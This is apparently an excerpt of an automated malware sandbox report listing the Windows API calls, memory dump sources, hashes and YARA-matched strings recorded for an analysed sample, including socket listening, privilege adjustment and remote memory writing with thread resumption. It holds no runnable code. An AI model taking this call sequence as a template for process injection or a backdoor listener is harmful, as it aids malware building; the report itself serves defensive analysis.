                                                                      • Opcode Fuzzy Hash: 01a0be7be1cca3e277cbe74bf1274033bfd94191dceb6c114f11378e75d2d0d4
                                                                      • Instruction Fuzzy Hash: 1811B272500204AEEB21DF55DD84F9BFBACEF45320F18846BEE459B241D674A5058B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction ID: 5998405d5df5c7b186a1968e1d002ec905804a137717b6da3203c4ab855d9f96
                                                                      • Opcode Fuzzy Hash: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction Fuzzy Hash: 4711BF72500204AFEB20DF55DD84FA7FBACEF49720F18846BEE089B242D674A405CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0107A61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 02576bb3686433ae6c35499e84f0a0bf659d019a971a093770ef5725680e8f9a
                                                                      • Instruction ID: 49e28683e215b5843f9d62b3c049de0ae608c72389bb7457cf78006e9a106fa0
                                                                      • Opcode Fuzzy Hash: 02576bb3686433ae6c35499e84f0a0bf659d019a971a093770ef5725680e8f9a
                                                                      • Instruction Fuzzy Hash: 97118172409380AFDB238F55DC44B62FFF4EF4A210F0885DAEE858B163C275A918DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(?), ref: 0107A6CC
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 7a2db738f4a2189bb7255a28597c3ba268deb6a0a8b165866314e809a1db97f9
                                                                      • Instruction ID: c222da032d6c61ec69f0be7a8bfa1ef4559505ceb88a72575d3e3356217c84a6
                                                                      • Opcode Fuzzy Hash: 7a2db738f4a2189bb7255a28597c3ba268deb6a0a8b165866314e809a1db97f9
                                                                      • Instruction Fuzzy Hash: 031159754093C4AFDB138B25DC54B62BFB4EF47620F0980DAED849B263D2696908DB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0091
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: 2f89f3d4b0c7efab5e1c0e78561062b8461f07282f7c0a27309069baef596781
                                                                      • Instruction ID: ce88bd3158e00f3b77f2f24e68f3977beafadde5c1c033f643b3b8d412a5d654
                                                                      • Opcode Fuzzy Hash: 2f89f3d4b0c7efab5e1c0e78561062b8461f07282f7c0a27309069baef596781
                                                                      • Instruction Fuzzy Hash: 3E11BF72500204BFEB219F55DC44F6AFFA8EF44324F18846BEE459B251D675A4098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 04FD0221
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 4b7f85ff7530638c53ddd05b4057a18a2399213288ff133b65a9d34690e1c114
                                                                      • Instruction ID: 9ee6e1d091795e6752a99a37c1abb3e7d770eb5e1f4f2a3fda1aebb89a00d9cc
                                                                      • Opcode Fuzzy Hash: 4b7f85ff7530638c53ddd05b4057a18a2399213288ff133b65a9d34690e1c114
                                                                      • Instruction Fuzzy Hash: 1B11B6725093806FD3119B15CC45F26FFB8EF86720F19819BED448B692D325B915CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD11E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 77bb959c7ee165a6e2daab7b141038f2bd6337b0cf1881a5ad4e793be492d834
                                                                      • Instruction ID: 45c4bcdd911ff3913ac6cfbc771ce7e691610eb0e5b32e44f596b1936db2dbb9
                                                                      • Opcode Fuzzy Hash: 77bb959c7ee165a6e2daab7b141038f2bd6337b0cf1881a5ad4e793be492d834
                                                                      • Instruction Fuzzy Hash: E4110272900204AFEB20CF55DD80F6BFFA8EF48321F18846BEE089B241D275A505CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD350D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 28c69f6db0e7eb8fe5b90e0f2ed595f104cccdd566c0912769c451565fb2fa35
                                                                      • Instruction ID: cf07fec97b239553ad7555dc428a7c149757337bb7e356134c524da57856413f
                                                                      • Opcode Fuzzy Hash: 28c69f6db0e7eb8fe5b90e0f2ed595f104cccdd566c0912769c451565fb2fa35
                                                                      • Instruction Fuzzy Hash: 5511B272509784AFDB228F15DC45B52FFB4EF06324F0884DEEE854B163C275A419DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0107A32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04FD253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FD162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CopyFileW.KERNELBASE(?,?,?), ref: 04FD2F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107BD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD2A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0107A1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04FD1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04FD1C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0107A61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04FD253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0107B802
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,?,?,?,?), ref: 0107B990
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0107A32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FD162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 04FD0221
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD350D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: closesocket
                                                                      • String ID:
                                                                      • API String ID: 2781271927-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD2A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0

APIs
• SetErrorMode.KERNELBASE(?), ref: 0107A6CC
Memory Dump Source
• Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

                                                                      • Opcode Fuzzy Hash: 88247fc23aa102599150f5f6d48a293cf1d48d5a82f132e8eec8f327367228e3
                                                                      • Instruction Fuzzy Hash: ACD05E79615A818FE3268A1CC1A8B953FE4AB51B04F4644FDE8408B663C768D9D1D200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250759190.0000000001072000.00000040.00000001.sdmp, Offset: 01072000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f073585b83bad544d9c1549d1446f0f75e75312704a69827f59b962a9eb9f8b
                                                                      • Instruction ID: 9c287e7bcb67eecbadb44a2f4f6adf9ddca1941b5cd3ad344b29f993650074a5
                                                                      • Opcode Fuzzy Hash: 9f073585b83bad544d9c1549d1446f0f75e75312704a69827f59b962a9eb9f8b
                                                                      • Instruction Fuzzy Hash: 93D05E347006818BD715DB0CC594F593BD4AB41B00F0684ECAD408B662C3A4D881C600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc8e6a082d76d54fbeb78f00eeeb2537a891e9741c4bb416c7a8215cb773e6ca
                                                                      • Instruction ID: 12ad325a0402b1bb050eac6e14a11f3dda96266d310d3916415e91ac2b5c7f99
                                                                      • Opcode Fuzzy Hash: cc8e6a082d76d54fbeb78f00eeeb2537a891e9741c4bb416c7a8215cb773e6ca
                                                                      • Instruction Fuzzy Hash: 0EC08C323041284F8B04B66DF4008EA77ED9F8D22131002BAE54EC7B20DDA2EC0047E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1bd8881ac2056743201ba2597f7fbaf5e7815aaeb0feb491e1094143e706201
                                                                      • Instruction ID: 29aac53ae87dad5106d7d082c938819aa79d7d99f092c5f3ce75699baaafd627
                                                                      • Opcode Fuzzy Hash: b1bd8881ac2056743201ba2597f7fbaf5e7815aaeb0feb491e1094143e706201
                                                                      • Instruction Fuzzy Hash: FEC08C36B00208CFCB10CAA4F4000CCF776FB8822A72041B7C518A2200CB3359218F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2739382a4b2fdb8a9fc3a7207f733463082fb1c72bcaf999eff721c26e7a2ce
                                                                      • Instruction ID: 2990ff6b6188a03f427f183366910ece032823a99f2d8f0b013f3ae61eb058f7
                                                                      • Opcode Fuzzy Hash: f2739382a4b2fdb8a9fc3a7207f733463082fb1c72bcaf999eff721c26e7a2ce
                                                                      • Instruction Fuzzy Hash: C3C0923000E7C08ED717737484654803FB06C07218BDA08DEC0C08F473C66A814AD322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Non-executed Functions

Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: __aulldvrm$__aullrem
• String ID: +$@AD

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: 5$H$O$b$i$}$}

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: (A$4(A$<&A$H&A$d&A$t'A$'A

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: $/A$,/A$0/A$X7A$`7A

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: bolb$bolc$rahc$tni$txet

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: $/A$,/A$0/A$4/A$`7A

Strings
Memory Dump Source
• Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp
• Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp
Yara matches
Similarity
• String ID: ^$^1A$^1A$b

                                                                      Executed Functions

                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E01027
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04E051DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04E052A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E01027
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E06BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04E051DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E06BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtResumeThread.NTDLL(?,?), ref: 04E06AEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04E052A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03369
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0345B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterAdaptersAddressesInfo
                                                                      • String ID:
                                                                      • API String ID: 4108532965-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
